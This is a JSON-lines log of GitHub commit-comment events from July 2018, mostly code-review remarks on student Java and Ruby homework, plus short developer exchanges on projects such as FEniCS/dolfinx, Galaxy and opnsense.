{"id":"7967207592","type":"CommitCommentEvent","actor":{"login":"michalhabera"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29712442,"position":4,"line":49,"path":"cpp/dolfin/io/XDMFFile.cpp","commit_id":"9690c078cfc749879c764e41b5709df1ad45f228","created_at":"2018-07-15T11:16:39Z","updated_at":"2018-07-15T11:16:39Z","author_association":"CONTRIBUTOR","body":"I know you had these issue in `defcon`. But it is difficult from that code to say what went wrong. Do you have some MWE?"}},"created_at":"2018-07-15T11:16:39Z"}
{"id":"7967207633","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29712443,"position":87,"line":87,"path":"src/lesson2SecondAttempt/Task1.java","commit_id":"1d4385b191d28712d8727ede293fe2cc043f07be","created_at":"2018-07-15T11:16:42Z","updated_at":"2018-07-15T11:16:42Z","author_association":"NONE","body":"в default должна быть конструкция break"}},"created_at":"2018-07-15T11:16:42Z"}
{"id":"7967207970","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/dhcp6c"},"payload":{"comment":{"id":29712444,"position":null,"line":null,"path":null,"commit_id":"0f8437824e2deca0849b61cf18bd90c2eca77127","created_at":"2018-07-15T11:17:01Z","updated_at":"2018-07-15T11:17:01Z","author_association":"MEMBER","body":"@marjohn56 FYI... in time for 18.7... thanks for all your work ❤️ "}},"created_at":"2018-07-15T11:17:01Z"}
{"id":"7967208086","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29712445,"position":38,"line":38,"path":"src/lesson2SecondAttempt/Task2.java","commit_id":"1d4385b191d28712d8727ede293fe2cc043f07be","created_at":"2018-07-15T11:17:08Z","updated_at":"2018-07-15T11:17:08Z","author_association":"NONE","body":"сложно написано, нечитабельно, разбивать на отдельные функции!"}},"created_at":"2018-07-15T11:17:08Z"}
{"id":"7967208201","type":"CommitCommentEvent","actor":{"login":"miniupnp"},"repo":{"name":"miniupnp/miniupnp"},"payload":{"comment":{"id":29712446,"position":null,"line":null,"path":null,"commit_id":"8babc5d01310599ffdfddce09b9cbbd68e508acc","created_at":"2018-07-15T11:17:13Z","updated_at":"2018-07-15T11:17:13Z","author_association":"OWNER","body":"c55d27f46ef9649feada028583c4d3354e7909f0"}},"created_at":"2018-07-15T11:17:13Z"}
{"id":"7967208613","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29712448,"position":33,"line":33,"path":"src/lesson2SecondAttempt/Task3.java","commit_id":"1d4385b191d28712d8727ede293fe2cc043f07be","created_at":"2018-07-15T11:17:38Z","updated_at":"2018-07-15T11:17:38Z","author_association":"NONE","body":"не надо делать отступ в первой строчке функции"}},"created_at":"2018-07-15T11:17:38Z"}
{"id":"7967209227","type":"CommitCommentEvent","actor":{"login":"Maximres"},"repo":{"name":"Maximres/EvPlanner"},"payload":{"comment":{"id":29712450,"position":null,"line":null,"path":null,"commit_id":"8f494fb1f4278f85e619f4e2f9c9b1b395e982a2","created_at":"2018-07-15T11:18:08Z","updated_at":"2018-07-15T11:18:08Z","author_association":"OWNER","body":"wtf"}},"created_at":"2018-07-15T11:18:08Z"}
{"id":"7967210361","type":"CommitCommentEvent","actor":{"login":"gwljp"},"repo":{"name":"gwljp/Work"},"payload":{"comment":{"id":29712452,"position":null,"line":null,"path":null,"commit_id":"314a2cadce1f666afa331794a4c668f6b4b7375e","created_at":"2018-07-15T11:19:13Z","updated_at":"2018-07-15T11:19:13Z","author_association":"OWNER","body":"o"}},"created_at":"2018-07-15T11:19:13Z"}
{"id":"7967210448","type":"CommitCommentEvent","actor":{"login":"tlimbani"},"repo":{"name":"PIH/openmrs-module-pihmalawi"},"payload":{"comment":{"id":29712453,"position":26,"line":75,"path":"omod/src/main/webapp/resources/htmlforms/chf_visit.xml","commit_id":"6cb02904242d180033829216d6b7de9a7b2592d8","created_at":"2018-07-15T11:19:17Z","updated_at":"2018-07-15T11:19:17Z","author_association":"CONTRIBUTOR","body":"Hi @cioan, thanks for pointing out the duplicate, I will correct it. \r\n\r\nI made an earlier commit before this where I used UUIDs for knew concepts. Or should I use UUIDs for the already existing concepts as well? "}},"created_at":"2018-07-15T11:19:17Z"}
{"id":"7967211090","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29712456,"position":43,"line":43,"path":"src/lesson2SecondAttempt/Task3.java","commit_id":"1d4385b191d28712d8727ede293fe2cc043f07be","created_at":"2018-07-15T11:19:49Z","updated_at":"2018-07-15T11:19:49Z","author_association":"NONE","body":"не совсем корректная проверка double на равенство нулю, тк. ноль целочисленный, а double - это не целочисленный"}},"created_at":"2018-07-15T11:19:49Z"}
{"id":"7967211116","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29712457,"position":14,"line":8,"path":"lesson4/train.rb","commit_id":"217232d9605a56a376c8ea0e6a340904fdc2a9be","created_at":"2018-07-15T11:19:51Z","updated_at":"2018-07-15T11:19:51Z","author_association":"NONE","body":"что-то здесь с отступами беда )"}},"created_at":"2018-07-15T11:19:51Z"}
{"id":"7967211422","type":"CommitCommentEvent","actor":{"login":"JamesOopus"},"repo":{"name":"JamesOopus/hello-world"},"payload":{"comment":{"id":29712458,"position":null,"line":null,"path":null,"commit_id":"260979329380675b38a91e18580525f7988116b7","created_at":"2018-07-15T11:20:08Z","updated_at":"2018-07-15T11:20:08Z","author_association":"OWNER","body":"It`s a test file"}},"created_at":"2018-07-15T11:20:08Z"}
{"id":"7967211778","type":"CommitCommentEvent","actor":{"login":"yanad87"},"repo":{"name":"bezumkin/Docs"},"payload":{"comment":{"id":29712459,"position":null,"line":null,"path":null,"commit_id":"a59983356f96d371393b2dc5322be71a3091a77b","created_at":"2018-07-15T11:20:23Z","updated_at":"2018-07-15T11:20:23Z","author_association":"NONE","body":"Здравствуйте Василий, не текущую версию ваше решение работает не корректно, не группируются категории по id, То есть выводит категории = количеству товаров в каждой."}},"created_at":"2018-07-15T11:20:23Z"}
{"id":"7967212108","type":"CommitCommentEvent","actor":{"login":"Starlord2307"},"repo":{"name":"L0ndinium/End-of-a-New-Beginning"},"payload":{"comment":{"id":29712461,"position":null,"line":null,"path":null,"commit_id":"485efde6bb8e49689f08ab06ff6a598ab81e3647","created_at":"2018-07-15T11:20:40Z","updated_at":"2018-07-15T11:20:40Z","author_association":"NONE","body":"i'm not even on the team anymore i still get messages about this?\n\nOp za 14 jul. 2018 om 21:15 schreef Jen <notifications@github.com>:\n\n> Noob\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/L0ndinium/End-of-a-New-Beginning/commit/485efde6bb8e49689f08ab06ff6a598ab81e3647#commitcomment-29710294>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Ah5OSA2lRcG1A5EtZDjoUnhu5yZiuVBpks5uGkNCgaJpZM4VP-DO>\n> .\n>\n"}},"created_at":"2018-07-15T11:20:40Z"}
{"id":"7967212445","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29712462,"position":15,"line":15,"path":"src/lesson3SecondAttempt/Task1.java","commit_id":"bdf0be58f8c6ffd65b832440c7df939823d97f44","created_at":"2018-07-15T11:20:57Z","updated_at":"2018-07-15T11:20:57Z","author_association":"NONE","body":"main должен быть вверху, тк класс должен читаться как страница книги - все последовательно"}},"created_at":"2018-07-15T11:20:57Z"}
{"id":"7967212464","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29712463,"position":null,"line":null,"path":null,"commit_id":"217232d9605a56a376c8ea0e6a340904fdc2a9be","created_at":"2018-07-15T11:20:58Z","updated_at":"2018-07-15T11:20:58Z","author_association":"NONE","body":"```\r\n  def detach_wagon\r\n    if (speed == 0 && @wagons.size > 0)\r\n        @wagons.pop\r\n    end\r\n  end\r\n```\r\nнужно проверить отступы и скобки не нужны вокруг условий"}},"created_at":"2018-07-15T11:20:58Z"}
{"id":"7967213010","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29712464,"position":12,"line":12,"path":"src/lesson3SecondAttempt/Task1.java","commit_id":"bdf0be58f8c6ffd65b832440c7df939823d97f44","created_at":"2018-07-15T11:21:26Z","updated_at":"2018-07-15T11:21:26Z","author_association":"NONE","body":"стараться избегать использования рекурсивного вызова, использовать обычные циклы"}},"created_at":"2018-07-15T11:21:26Z"}
{"id":"7967213302","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29712466,"position":null,"line":null,"path":null,"commit_id":"217232d9605a56a376c8ea0e6a340904fdc2a9be","created_at":"2018-07-15T11:21:41Z","updated_at":"2018-07-15T11:21:41Z","author_association":"NONE","body":"```ruby\r\n  def deceleration(value)\r\n    @speed = (value < @speed) ? @speed - value : 0\r\n  end\r\n```\r\nне нужны скобки вокруг условия"}},"created_at":"2018-07-15T11:21:41Z"}
{"id":"7967214409","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29712470,"position":11,"line":11,"path":"src/lesson3SecondAttempt/Task2Loop.java","commit_id":"bdf0be58f8c6ffd65b832440c7df939823d97f44","created_at":"2018-07-15T11:22:36Z","updated_at":"2018-07-15T11:22:36Z","author_association":"NONE","body":"не лучшим образом выбран класса потока ввода-вывода, т.к. приходится производить куча конвертаций из одного типа в другой"}},"created_at":"2018-07-15T11:22:36Z"}
{"id":"7967221536","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29712495,"position":30,"line":30,"path":"src/homework/homework03/Task3.java","commit_id":"4a75b673e058abc1b36b0e8edc7cb6a27964cb21","created_at":"2018-07-15T11:29:02Z","updated_at":"2018-07-15T11:29:02Z","author_association":"NONE","body":"теряешь вещественную часть, приводить надо к double один из операндов и сам srednee"}},"created_at":"2018-07-15T11:29:02Z"}
{"id":"7967221870","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29712496,"position":4,"line":4,"path":"lesson4/passengerTrain.rb","commit_id":"217232d9605a56a376c8ea0e6a340904fdc2a9be","created_at":"2018-07-15T11:29:20Z","updated_at":"2018-07-15T11:29:20Z","author_association":"NONE","body":"а этот то метод ты зря убрала\r\nу тебя теперь не выполняется вот этот пункт ТЗ: \"К пассажирскому поезду можно прицепить только пассажирские, к грузовому - грузовые.\"\r\nпочитай внимательно предыдущий комментарий Влада\r\nон предлагал эти методы здесь и оставить в подклассах... он только метод возвращающий тип предлагал двинуть в суперкласс"}},"created_at":"2018-07-15T11:29:20Z"}
{"id":"7967222351","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29712497,"position":13,"line":13,"path":"src/homework/homework01/Task1.java","commit_id":"e3c1aefd3ec339c0e902e901b0f7506e778eba43","created_at":"2018-07-15T11:29:46Z","updated_at":"2018-07-15T11:29:46Z","author_association":"NONE","body":"делать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T11:29:46Z"}
{"id":"7967222497","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29712498,"position":4,"line":4,"path":"lesson4/cargoTrain.rb","commit_id":"217232d9605a56a376c8ea0e6a340904fdc2a9be","created_at":"2018-07-15T11:29:55Z","updated_at":"2018-07-15T11:29:55Z","author_association":"NONE","body":"см. коммент ниже в классе ПассажирскийПоезд"}},"created_at":"2018-07-15T11:29:55Z"}
{"id":"7967222864","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29712503,"position":4,"line":49,"path":"cpp/dolfin/io/XDMFFile.cpp","commit_id":"9690c078cfc749879c764e41b5709df1ad45f228","created_at":"2018-07-15T11:30:11Z","updated_at":"2018-07-15T11:30:11Z","author_association":"MEMBER","body":"MWE is simple. Run `touch foo` on one node and then periodically run `ls foo` on another node. On some file systems (NFS) it can take significant delay until `foo` is seen on the other node.\r\n\r\nRegarding the barrier around `H5Fclose`. Please let's not interpret statement \"the function is collective\" as \"there has to be a synchronization point before the function call\". This is simply incorrect."}},"created_at":"2018-07-15T11:30:11Z"}
{"id":"7967223242","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29712506,"position":25,"line":25,"path":"src/homework/homework01/Task1.java","commit_id":"e3c1aefd3ec339c0e902e901b0f7506e778eba43","created_at":"2018-07-15T11:30:28Z","updated_at":"2018-07-15T11:30:28Z","author_association":"NONE","body":"вызов функции расчет високостного дня нужно делать лишь раз, когда месяц равен 2, сложно написано"}},"created_at":"2018-07-15T11:30:28Z"}
{"id":"7967223644","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29712507,"position":59,"line":59,"path":"src/homework/homework01/Task1.java","commit_id":"e3c1aefd3ec339c0e902e901b0f7506e778eba43","created_at":"2018-07-15T11:30:48Z","updated_at":"2018-07-15T11:30:48Z","author_association":"NONE","body":"\r\nстараться придерживаться того, чтобы из функции был только один return"}},"created_at":"2018-07-15T11:30:48Z"}
{"id":"7967223781","type":"CommitCommentEvent","actor":{"login":"jsolson"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29712508,"position":null,"line":null,"path":null,"commit_id":"59383c29a7af226b31df4f72d0e628f9bcbc4b4b","created_at":"2018-07-15T11:30:56Z","updated_at":"2018-07-15T11:30:56Z","author_association":"COLLABORATOR","body":"Nice.\r\n\r\nThe struts on the 40 and 46 don't reach the fuselage anymore. The 60 and 60XL don't have them.\r\n\r\nI think we should make the thrust on the 60XL the same or very close to the 60. That would give it about a 50% longer burn. As is they have the same burn time, so all you're really doing is leaving the core struggling with whatever weight called for the extra thrust when they burn out."}},"created_at":"2018-07-15T11:30:56Z"}
{"id":"7967223939","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29712509,"position":60,"line":60,"path":"src/homework/homework01/Task1.java","commit_id":"e3c1aefd3ec339c0e902e901b0f7506e778eba43","created_at":"2018-07-15T11:31:04Z","updated_at":"2018-07-15T11:31:04Z","author_association":"NONE","body":"да и проще можно было написать в одну строчку, как мы писали на занятии"}},"created_at":"2018-07-15T11:31:04Z"}
{"id":"7967224402","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29712511,"position":30,"line":30,"path":"src/homework/homework01/Task2.java","commit_id":"e3c1aefd3ec339c0e902e901b0f7506e778eba43","created_at":"2018-07-15T11:31:28Z","updated_at":"2018-07-15T11:31:28Z","author_association":"NONE","body":"давай осмысленные название переменным"}},"created_at":"2018-07-15T11:31:28Z"}
{"id":"7967224806","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29712512,"position":4,"line":49,"path":"cpp/dolfin/io/XDMFFile.cpp","commit_id":"9690c078cfc749879c764e41b5709df1ad45f228","created_at":"2018-07-15T11:31:49Z","updated_at":"2018-07-15T11:31:49Z","author_association":"MEMBER","body":"> Regarding the barrier around H5Fclose. Please let's not interpret statement \"the function is collective\" as \"there has to be a synchronization point before the function call\". This is simply incorrect.\r\n\r\nUsing this logic ad absurdum, there `MPI_Barrier` would require that there is `MPI_Barrier` before which would require that there is `MPI_Barrier` before which would require that there is `MPI_Barrier` before..."}},"created_at":"2018-07-15T11:31:49Z"}
{"id":"7967224847","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29712513,"position":50,"line":50,"path":"src/homework/homework01/Task2.java","commit_id":"e3c1aefd3ec339c0e902e901b0f7506e778eba43","created_at":"2018-07-15T11:31:51Z","updated_at":"2018-07-15T11:31:51Z","author_association":"NONE","body":"сложно написано, разбивать на функции надо было"}},"created_at":"2018-07-15T11:31:51Z"}
{"id":"7967225292","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29712514,"position":27,"line":27,"path":"src/homework/homework01/Task3.java","commit_id":"e3c1aefd3ec339c0e902e901b0f7506e778eba43","created_at":"2018-07-15T11:32:11Z","updated_at":"2018-07-15T11:32:11Z","author_association":"NONE","body":"сразу можно return (b * b - 4 * a * c);"}},"created_at":"2018-07-15T11:32:11Z"}
{"id":"7967225530","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29712516,"position":38,"line":38,"path":"src/homework/homework01/Task3.java","commit_id":"e3c1aefd3ec339c0e902e901b0f7506e778eba43","created_at":"2018-07-15T11:32:22Z","updated_at":"2018-07-15T11:32:22Z","author_association":"NONE","body":"сразу return d < 0;"}},"created_at":"2018-07-15T11:32:22Z"}
{"id":"7967225678","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29712517,"position":47,"line":47,"path":"src/homework/homework01/Task3.java","commit_id":"e3c1aefd3ec339c0e902e901b0f7506e778eba43","created_at":"2018-07-15T11:32:30Z","updated_at":"2018-07-15T11:32:30Z","author_association":"NONE","body":"return d == 0;"}},"created_at":"2018-07-15T11:32:30Z"}
{"id":"7967225917","type":"CommitCommentEvent","actor":{"login":"joaotavora"},"repo":{"name":"joaotavora/sly"},"payload":{"comment":{"id":29712518,"position":null,"line":null,"path":null,"commit_id":"7833f58281f4f9eda6cf590e3ce22022e3b4eafb","created_at":"2018-07-15T11:32:42Z","updated_at":"2018-07-15T11:32:42Z","author_association":"OWNER","body":"Thanks, you're right, but the fixing isn't worth a commit, and I probably need to redo that part anyway for other reasons."}},"created_at":"2018-07-15T11:32:42Z"}
{"id":"7967226053","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"PronovichR4/ITAcademyJ1"},"payload":{"comment":{"id":29712519,"position":56,"line":56,"path":"src/homework/homework01/Task3.java","commit_id":"e3c1aefd3ec339c0e902e901b0f7506e778eba43","created_at":"2018-07-15T11:32:49Z","updated_at":"2018-07-15T11:32:49Z","author_association":"NONE","body":"не надо оставлять лишних отступов в коде"}},"created_at":"2018-07-15T11:32:49Z"}
{"id":"7967227329","type":"CommitCommentEvent","actor":{"login":"mmkllr"},"repo":{"name":"L0ndinium/End-of-a-New-Beginning"},"payload":{"comment":{"id":29712523,"position":null,"line":null,"path":null,"commit_id":"485efde6bb8e49689f08ab06ff6a598ab81e3647","created_at":"2018-07-15T11:33:52Z","updated_at":"2018-07-15T11:33:52Z","author_association":"COLLABORATOR","body":"@Starlord2307 🤷‍♂️ "}},"created_at":"2018-07-15T11:33:52Z"}
{"id":"7967227691","type":"CommitCommentEvent","actor":{"login":"Maledong"},"repo":{"name":"vsemozhetbyt/nodejs.org"},"payload":{"comment":{"id":29712526,"position":null,"line":null,"path":null,"commit_id":"14e0ee5ee24c4c6000aa2795988e4d8902c34220","created_at":"2018-07-15T11:34:11Z","updated_at":"2018-07-15T11:34:11Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/40081831/42733570-dd412ade-8865-11e8-96d6-008bb09aaba4.png)\r\nIt seems you've also missed `Privacy Policy`. Kind to notify you :)\r\nCompare with `en`, it seems we've always missed something until we see the official site and we're aware of that."}},"created_at":"2018-07-15T11:34:11Z"}
{"id":"7967227700","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29712527,"position":116,"line":116,"path":"chemie/chemie/static/css/landing-style.css","commit_id":"748ec2c8d1b2935252d30ea73b2d7cb9729204b7","created_at":"2018-07-15T11:34:12Z","updated_at":"2018-07-15T11:34:12Z","author_association":"COLLABORATOR","body":"Typo? height* also seelinr 123"}},"created_at":"2018-07-15T11:34:12Z"}
{"id":"7967228096","type":"CommitCommentEvent","actor":{"login":"mj-jackson"},"repo":{"name":"mj-jackson/symfony-fluid-bundle"},"payload":{"comment":{"id":29712530,"position":null,"line":null,"path":null,"commit_id":"9fad9a2028059d3238bf8101561182db2a27e7c4","created_at":"2018-07-15T11:34:33Z","updated_at":"2018-07-15T11:34:33Z","author_association":"OWNER","body":"If you install symfony/skeleton (not website-skeleton), templating is not included and therefore it should be required in here."}},"created_at":"2018-07-15T11:34:33Z"}
{"id":"7967229228","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712531,"position":5,"line":5,"path":"src/homework/cycles/FirstTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:35:26Z","updated_at":"2018-07-15T11:35:26Z","author_association":"NONE","body":"делать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T11:35:26Z"}
{"id":"7967229798","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712532,"position":15,"line":15,"path":"src/homework/cycles/SecondTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:35:55Z","updated_at":"2018-07-15T11:35:55Z","author_association":"NONE","body":"в отдельную функцию лучше выносить расчет фибоначи"}},"created_at":"2018-07-15T11:35:55Z"}
{"id":"7967230107","type":"CommitCommentEvent","actor":{"login":"harhail666"},"repo":{"name":"OpenKore/openkore"},"payload":{"comment":{"id":29712533,"position":null,"line":null,"path":null,"commit_id":"1b8e86b864c8e038e1d7bab9c6c3e25c7ab5b719","created_at":"2018-07-15T11:36:11Z","updated_at":"2018-07-15T11:36:11Z","author_association":"NONE","body":"HI! Can you help me this is the first time that i use BOT i received\r\n![screenshot 11](https://user-images.githubusercontent.com/41236658/42733600-51040b8a-8866-11e8-993b-56359e2a5403.png)\r\n this error how to resolved this. Thanks in advance"}},"created_at":"2018-07-15T11:36:11Z"}
{"id":"7967230690","type":"CommitCommentEvent","actor":{"login":"xXSteelSwordXx"},"repo":{"name":"tenplus1/mobs_monster"},"payload":{"comment":{"id":29712534,"position":null,"line":null,"path":null,"commit_id":"f78f81ddf94a50541ac4cfc16d527e9c2e5ae77a","created_at":"2018-07-15T11:36:38Z","updated_at":"2018-07-15T11:36:38Z","author_association":"NONE","body":"Hello Ten,  do you know any app to open b3d files on android?\r\nThanks.\r\n-- xXaliXx"}},"created_at":"2018-07-15T11:36:38Z"}
{"id":"7967230765","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712535,"position":1,"line":1,"path":"src/homework/cycles/ThirdTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:36:41Z","updated_at":"2018-07-15T11:36:41Z","author_association":"NONE","body":"пакеты и классы не называть во множественном числе"}},"created_at":"2018-07-15T11:36:41Z"}
{"id":"7967230979","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712536,"position":34,"line":34,"path":"src/homework/cycles/ThirdTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:36:53Z","updated_at":"2018-07-15T11:36:53Z","author_association":"NONE","body":"\r\nкод не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-15T11:36:53Z"}
{"id":"7967231036","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29712537,"position":5,"line":75,"path":"lesson4/rail_road.rb","commit_id":"217232d9605a56a376c8ea0e6a340904fdc2a9be","created_at":"2018-07-15T11:36:56Z","updated_at":"2018-07-15T11:36:56Z","author_association":"NONE","body":"лучше конечно избегать таких длинных строк, даже если это один путс\r\nесть куча разных способов этого достичь\r\nсамый простой:\r\n```ruby\r\n2.5.1 :003 > puts \"some string\\n\\\r\n2.5.1 :004\"> next line\\n\\\r\n2.5.1 :005\"> third line\"\r\nsome string\r\nnext line\r\nthird line\r\n => nil \r\n2.5.1 :006 >\r\n```\r\nили несколько путсов:\r\n```ruby\r\nputs 'first line\"\r\nputs \"second line\"\r\nputs \"third line\"\r\n```\r\nили как-то так:\r\n```ruby\r\nlines = [\r\n  \"first line\",\r\n  \"second line\",\r\n  \"third line\"\r\n]\r\nlines.each { |line| puts line }\r\n```"}},"created_at":"2018-07-15T11:36:56Z"}
{"id":"7967231200","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29712538,"position":4,"line":132,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"5a3276ea242fd8fb10d3a1d8373598f660c058e1","created_at":"2018-07-15T11:37:06Z","updated_at":"2018-07-15T11:37:06Z","author_association":"COLLABORATOR","body":"Why adv and not prn?"}},"created_at":"2018-07-15T11:37:06Z"}
{"id":"7967231667","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712539,"position":28,"line":28,"path":"src/homework/cycles/ThirdTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:37:30Z","updated_at":"2018-07-15T11:37:30Z","author_association":"NONE","body":"теряешь вещественную часть. Надо приводить один из операндов в double и сам averageRainfall тоже"}},"created_at":"2018-07-15T11:37:30Z"}
{"id":"7967231809","type":"CommitCommentEvent","actor":{"login":"Weyinmik"},"repo":{"name":"udacity/ud843_DidYouFeelIt"},"payload":{"comment":{"id":29712540,"position":null,"line":null,"path":null,"commit_id":"0a9e6c2338969c6ad0311f5b2b09ea3895a3f5fa","created_at":"2018-07-15T11:37:38Z","updated_at":"2018-07-15T11:37:38Z","author_association":"NONE","body":"For those that have broken code ensure to follow th video closely and change your variable \"earthquake\" to \"result\" in the doInBackground(String...urls) method as shown below:\r\n\r\n@Override\r\n        protected Event doInBackground(String... urls) {\r\n            // Perform the HTTP request for earthquake data and process the response.\r\n            Event earthquake = Utils.fetchEarthquakeData(urls[0]);\r\n            return result;\r\n        }\r\n\r\nto \r\n@Override\r\n        protected Event doInBackground(String... urls) {\r\n            // Perform the HTTP request for earthquake data and process the response.\r\n            Event result = Utils.fetchEarthquakeData(urls[0]);\r\n            return result;\r\n        }"}},"created_at":"2018-07-15T11:37:38Z"}
{"id":"7967232232","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712542,"position":38,"line":38,"path":"src/homework/functions/FirstTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:38:02Z","updated_at":"2018-07-15T11:38:02Z","author_association":"NONE","body":"можно просто nextMonth++"}},"created_at":"2018-07-15T11:38:02Z"}
{"id":"7967232347","type":"CommitCommentEvent","actor":{"login":"mvdbeek"},"repo":{"name":"mvdbeek/galaxy"},"payload":{"comment":{"id":29712543,"position":5,"line":473,"path":"lib/galaxy/tools/parameters/dynamic_options.py","commit_id":"491841275678e522ece73c0533974dcf2c46dfb7","created_at":"2018-07-15T11:38:08Z","updated_at":"2018-07-15T11:38:08Z","author_association":"OWNER","body":"What do you think about:\r\n```\r\nclass DynamicOptions(object):\r\n    def __init__(self):\r\n        def load_from_parameter():\r\n            obj = self.tool_param\r\n            ret = eval(transform_lines, {'self': self, 'obj': obj})\r\n            print(ret)\r\n        self.separator = '\\t'\r\n        self.tool_param = ['foo', 'bar']\r\n        load_from_parameter()\r\n\r\ntransform_lines = '[\"%s%s%s\" % (line, self.separator, line) for line in obj]'\r\n\r\nf = DynamicOptions()\r\n```\r\n\r\nThat would add obj and self to the global scope, and this needs to be the global scope because the list comprehension gets its own local scope, so passing `locals()` as locals doesn't work."}},"created_at":"2018-07-15T11:38:08Z"}
{"id":"7967232360","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712544,"position":40,"line":40,"path":"src/homework/functions/FirstTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:38:08Z","updated_at":"2018-07-15T11:38:08Z","author_association":"NONE","body":"nextDay++"}},"created_at":"2018-07-15T11:38:08Z"}
